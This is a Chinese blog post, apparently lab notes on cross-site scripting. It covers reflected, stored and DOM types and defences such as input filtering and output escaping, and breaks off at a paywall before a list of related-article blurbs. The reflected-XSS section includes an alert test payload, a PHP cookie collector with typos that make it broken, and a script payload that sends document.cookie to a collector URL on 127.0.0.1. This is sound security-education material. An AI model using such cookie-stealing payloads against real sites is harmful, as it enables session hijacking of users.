XSS跨站脚本

最新推荐文章于 2025-06-06 14:15:25 发布
原创 最新推荐文章于 2025-06-06 14:15:25 发布 · 1.2k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #web安全

本文详细介绍了XSS跨站脚本的类型,包括反射性XSS、存储型XSS和DOM型XSS,并通过实例展示了它们的利用方式。同时,文章探讨了XSS的防范措施,如输入过滤和输出转义。通过实例展示了如何通过反射型和存储型XSS获取用户cookie,以及如何通过DOM型XSS进行攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

XSS(跨站脚本)

XSS是一种发生在前端浏览器端的漏洞,危害对象也是前端用户,形成XSS漏洞的主要原因是程序对输入输出没有做合适的处理,导致精心构造的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。
因此在XSS漏洞的防范上一般会采用“对输入进行过滤”和“输出进行转义”的方式进行处理。

  • 输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入。
  • 输出转义:根据输出点的位置对输出到前端的额呢绒进行适当转义。

反射性xss(get)

随意输入字符串,回显who is xxx,i don’t care
f12查看,允许输入最大长度为20.
捕获.PNG
更改一下可输入长度,输入一个简单的xss语句:<script>alert("XSS")</script>
发现可以解析,即存在xss漏洞。
捕获.PNG
观察源码可知,它将提交的信息重新发送回来,后台没有对我们提交的信息做任何的漏洞。GET型的xss,一般将带有xss的url伪装后发送给目标即可。
如果是post型xss,无法直接使用url的方式进行攻击。

利用

需要一个接受cookie的服务器(127.0.0.1:80),来接收受害主机的cookie。

<?php
$cookie=$_GET['cookie'];
 #fp=$fopen("cookie.txt","a");
fwirte($fp,"Cookie:".$cookie."/n")
?>
  • 构造一个xss攻击的js代码
    <script>window.open("http://127.0.0.1/getcookie.php?cookie="+document.cookie);</script>
    新弹出窗口成功获取到cookie。但是cookie.txt中并没有存储到cookie值……
    1
最低0.47元/天 解锁文章

200万优质内容无限畅学
XSS跨站脚本攻击
m0_74120514的博客
07-19 1164
安全漏洞,它允许攻击者在目标网站上注入恶意的客户端脚本。这些脚本通常以JavaScript编写,执行在用户的浏览器上,从而窃取用户信息、劫持用户会话或者重定向到恶意网站。就是。
xss 全编码两次_xss个人经验总结
weixin_39795479的博客
12-18 334
1,利用xss跳转网页 alert(window.location.href='http://www.sjtu.edu.cn')2,弹出cookie alert(document.cookie)2,可以试着对xss poc代码进行url编码再利用3,闭合相应的标签;可以试着用“+”替代空格4,cookie中有&等字符会分割cookie以至于打不到完整cookie这时可以用 e...
渗透测试笔记(五)——XSS跨站脚本攻击
m0_67044952的博客
06-12 1155
XSS:Cross Site Scripting(跨站脚本)为了避免与CSS混淆,所以简称XSSXSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到Web页面中去,使别的用户访问都会执行相应的嵌入代码。从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。XSS攻击的危害盗取各类用户账号,如机器登录账号、用户网银账号、各类管理员账号控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力盗窃企业重要的具有商业价值的资料非法转账
互联网安全架构平台设计之预防XSS攻击
李永志的博客
01-20 4248
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序,是最常见的安全漏洞。 一、什么是XSS攻击? XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不
XSS跨站脚本攻击,(非常详细)从零基础到精通,收藏这篇就够了!
最新发布
Libra1313的博客
06-06 675
还在傻傻分不清XSS?别out啦!这可是网络安全界的“老司机”必备技能。想知道黑客如何利用XSS漏洞,在你浏览网页的时候,悄悄“搞事情”吗?赶紧上车,带你一探究竟!
XSS注入的原理与实现
LJH1999ZN的博客
02-17 5026
一、JavaScript的常用脚本 1.window.location.href 用来跳转页面 eg:<script>window.location.href='www.jd.com'</script> 2.document.cookie 获取客户端的cookie值 3.script 可以通过“src”属性引入JavaScript文件 二、什么是同源策略 同源策略在web应用的安全模型中是一个重要概念。在这个策略下,web浏览器允许第一个页面的脚本访问第...
结合DVWA靶场学习XSS漏洞-盗取cookie
LUOBIKUN的博客
10-06 3501
XSS概述参考前置知识:定义分类反射型XSS:存储型XSSDOM型XSS危害防御练习(DVWA靶场)反射型:DVWA-low一般的XSS攻击重定向:DVWA-mediumDVWA-HighDVWA-Impossible存储型XSSDVWA-low一般的XSS攻击重定向:DVWA-mediumDVWA-low一般的XSS攻击重定向:获取cookieDVWA-mediumDVWA-high 参考 XSS攻击进阶篇——那些年我们看不懂的XSS 通过浏览器编码深入探究XSS绕过 DVWA-XSS学习笔记 前置知识:
前端安全XSS攻击
weixin_30325971的博客
10-29 331
前端安全XSS 转载请注明出处:unclekeith: 前端安全XSS XSS定义 XSS, 即为(Cross Site Scripting), 中文名为跨站脚本, 是发生在目标用户的浏览器层面上的,当渲染DOM树的过程成发生了不在预期内执行的JS代码时,就发生了XSS攻击。 跨站脚本的重点不在‘跨站’上,而在于‘脚本’上。大多数XSS攻击的主要方式是嵌入一段远程或者第三方域上的JS代码。实际...
XSS跨站脚本攻击剖析与防御.pdf
05-16
XSS跨站脚本攻击剖析与防御》是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做...
XSS跨站脚本攻击漏洞修复方法
06-18
**XSS跨站脚本攻击漏洞修复方法** XSS(Cross-Site Scripting)跨站脚本攻击是一种常见的网络安全威胁,它允许攻击者在用户的浏览器上执行恶意代码,从而窃取用户敏感信息、操纵用户行为或者对网站进行破坏。本文将...
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击知识点总结 xss跨站脚本攻击是一种常见的Web应用安全漏洞,攻击者可以通过在网站上注入恶意代码,盗取用户敏感信息,控制企业数据,非法转账,发送恶意邮件等。下面是xss跨站脚本攻击的知识点总结:...
XSS跨站脚本攻击剖析与防御
04-28
XSS跨站脚本攻击剖析与防御是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做了...
【转】XSS攻击及防御
05-08 262
本文来自:高爽|Coder,原文地址:http://blog.csdn.net/ghsau/article/details/17027893。 XSS又称CSS,全称Cross SiteScript,跨站脚本攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当其它...
web安全XSS攻击原理及防范
2401_83739727的博客
04-12 1083
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
Pikachu靶场之XSS漏洞详解
热门推荐
m0_46467017的博客
05-13 1万+
Pikachu靶场之XSS漏洞详解前言XSS漏洞简述第1关 反射型xss(get)第2关 反射性xss(post)第3关 存储型xss第4关 DOM型xss第5关 DOM型xss-x第6关 xss盲打第7关 xss之过滤第8关 xss之htmlspecialchars第9关 xsshref输出第10关 xss之js输出 前言 本篇文章用于巩固对自己xss漏洞的学习总结,其中部分内容借鉴了以下博客。 链接: pikachu XSS Cross-Site Scripting皮卡丘漏洞平台通关系列 链接: P
【前端安全】JavaScript防http劫持与XSS
weixin_34127717的博客
08-16 394
作为前端,一直以来都知道HTTP劫持与XSS跨站脚本(Cross-site scripting)、CSRF跨站请求伪造(Cross-site request forgery)。但是一直都没有深入研究过,前些日子同事的分享会偶然提及,我也对这一块很感兴趣,便深入研究了一番。 最近用 JavaScript 写了一个组件,可以在前端层面防御部分 HTTP 劫持与 XSS。 当然,防御这些劫持最好的方...
跨站脚本攻击详解
weixin_30700977的博客
02-18 797
1 前言 近年来,随着Web2.0的大潮,越来越多的人开始关注Web安全,新的Web攻击手法层出不穷,Web应用程序面临的安全形势日益严峻。 跨站脚本攻击(XSS)就是常见的Web攻击技术之一,由于跨站脚本漏洞易于出现且利用成本低,所以被OWASP开放式Web应用程序安全项目(OWASP,Open Web Application Security Project)列为当前的头号Web...
前端黑客之XSS、CSRF
caoxinhui521的博客
08-09 514
XSS跨站脚本,发生在目标网站中目标用户的浏览器层面上,当用户浏览器渲染整个HTML文档的过程中出现了不被预期的脚本指令并执行时,XSS就会发生。 绝大多数XSS攻击都会采用嵌入一段远程或者第三方域上的脚本资源。任何安全问题都有“输入”的概念,很多时候输入的内容长度是有限制的。真正的XSS攻击弹出窗无意义。一般会注入类似 这样做的好处:攻击代码容易控制 XXS类型
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值